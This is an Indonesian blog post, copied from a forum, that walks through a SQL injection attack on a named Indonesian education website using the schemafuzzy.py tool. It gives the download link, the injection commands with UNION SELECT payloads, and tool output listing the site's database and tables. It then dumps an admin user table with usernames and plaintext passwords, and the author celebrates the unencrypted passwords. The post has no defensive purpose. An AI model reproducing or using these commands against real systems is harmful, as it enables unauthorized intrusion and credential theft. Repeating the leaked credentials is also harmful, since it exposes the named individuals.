• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    SBS opening Fix Autosultan

    Autosultan zonamotivasi
    Januari 25, 2022
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "deface dengan Schemafuzzy.py"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomeHackingwebsitedeface dengan Schemafuzzy.py
    deface dengan Schemafuzzy.py

    deface dengan Schemafuzzy.py

    Simpan Postingan


    1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
    2.Schemafuzz (http://rup.ee/schemafuzzy.py)
    3.CMD

    buka cmd masuk ke folder tempat schemafuzz.py berada...
    ketikkan -> schemafuzz.py -u "url target" --perintah (list perintah ada di bawah)
    1. masukkan target
    saya contohkan target adalah -> 
    http://www.ditplb.or.id/profile.php?id=1

    2.Masukkan perintah untuk mencari colom name
    contoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1" --findcol
    Maka keluar:


    [+] URL: [url=http://www.ditplb.or.id/profile.php?id=1--]http://www.ditplb.or.id/profile.php?id=1--[/url] [+] Evasion Used: "+" "--" [+] 20:36:29 [-] Proxy Not Given [+] Attempting To find the number of columns... [+] Testing: 0,1,2, [+] Column Length is: 3 [+] Found null column at column #: 2 [+] SQLi URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... CT+0,1,2-- [+] darkc0de URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... 1,darkc0de [-] Done!
    ternyata ada

     2 kolom. Berarti kita gunain http://www.ditplb.or.id/profile.php?id= ... 1,darkc0de untuk inject
     3.Cari database dg command --dbs contoh : schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dbs Maka keluar:

    Code:
    [+] URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... darkc0de-- [+] Evasion Used: "+" "--" [+] 2032 [-] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: t15618_plb User: t15618_plbid@localhost Version: 5.0.32-Debian_7etch8 [+] Showing all databases current user has access too! [+] Number of Databases: 1 [0] t15618_plb [-] 2039 [-] Total URL Requests 3 [-] Done

    disitu udah keliatan nama DBnya??? t15618_plb

    4.Cari nama table dalam database
    contoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --schema -D namadatabase
    Jadinya: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --schema -D t15618_plb
    Maka keluar:

    Code:
    [+] URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... darkc0de-- [+] Evasion Used: "+" "--" [+] 20:43:10 [-] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: t15618_plb User: t15618_plbid@localhost Version: 5.0.32-Debian_7etch8 [+] Showing Tables & Columns from database "t15618_plb" [+] Number of Tables: 11 [Database]: t15618_plb [table: Columns] [0]bukutamu: id,pengirim,email,pesan [1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim [2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keteran gan [3]frm_kategori: id_kat,kategori [4]kabupaten: ID_kab,ID_prop,Kabupaten [5]pelatihan: ID,Pelatihan [6]profile: ID_Profile,sinopsis,Profile [7]propinsi: ID_prop,Propinsi [8]sd: ID_sd,ID_1,SD,Detail [9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email [10]user: ID_user,UserID,Password,Keterangan,Admin [-] 20:44:39 [-] Total URL Requests 43 [-] Done



    Berarti web itu mempunyai 11 tabel.... n nama kolomnya juga udah ada..... tinggal pilih deh mana yang mau ditelanjangin...hhehehe (emg cewek ) :P

    5.Melihat isi dari suatu tabel n kolom
    contohl :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dump -D namadatabase -T namatable -C namakolom
    Jadinya :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dump -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,Admin
    Maka keluar:

    Code:
    [+] URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... darkc0de-- [+] Evasion Used: "+" "--" [+] 20:53:46 [-] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: t15618_plb User: t15618_plbid@localhost Version: 5.0.32-Debian_7etch8 [+] Dumping data from database "t15618_plb" Table "user" [+] and Column(s) ['ID_user', 'UserID', 'Password', 'Keterangan', 'Admin'] [+] Number of Rows: 13 [0] 1:direktur:direkturplbirektur PLB:Admin Direktur PLB: [1] 2:yusuf:siplb:Achmad Yusuf:Admin Achmad Yusuf: [2] 3:abdulmukti:fatmawatimukti: P. Abdul Mukti:Admin P. Abdul Mukti: [3] 4:harryrogkal: ProgKAL:Admin ProgKAL: [4] 5:samino:kurikulum:Kurikulum:Admin Kurikulum: [5] 6:mugiarsih:manajemen:Manajemen:Admin Manajemen: [6] 7:sutopo:kesiswaan:Kesiswaan:Admin Kesiswaan: [7] 8:winarno:sarana:Sarana:Admin Sarana: [8] 9:sanusi:tatausaha:Tata Usaha:Admin Tata Usaha: [9] 10:sutji:evaluasi:Evaluasi:Admin Evaluasi: [10] 11:thamrin:informatika:Informatika:Admin Informatika: [11] 12:adjie:kerjasama:Kerjasama:Admin Kerjasama: [12] 13:media:media:Media:Admin Media: [13] No data [-] 20:54:14 [-] Total URL Requests 15 [-] Done



    Anj**G... kok user id n passwordnya gak di encrypt ya...........mungkin ini rejeki kita biar gak susah2 decryptnya

    Cara diatas berlaku untuk sql versi 5 , untuk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolom
    contoh:schemafuzz.py -U "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --fuzz

    sekian tutor cupu ini moga bermanfaat. kalo ada yang kurang mohon di tambahin OK

    credit: uteng

    copas from : PHL


    DOWNLOAD SCHEMAFUZZY : 


    http://rup.ee/schemafuzzy.py

    Hacking website
    September 18, 2015 • 0 komentar
    Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
    Isi dari komentar adalah tanggung jawab dari pengirim. T.I Sniper mempunyai hak untuk tidak memperlihatkan komentar yang tidak etis atau kasar. Jika ada komentar yang melanggar aturan ini, tolong dilaporkan.

    T.I Sniper

    Your description here

    • Follow
    • Autosultan
    • Wa Admin Bisnis
    Copyright ©2010 - 2022 🔥 T.I Sniper.
    • Beranda
    • Cari
    • Posting
    • Trending
    • Tersimpan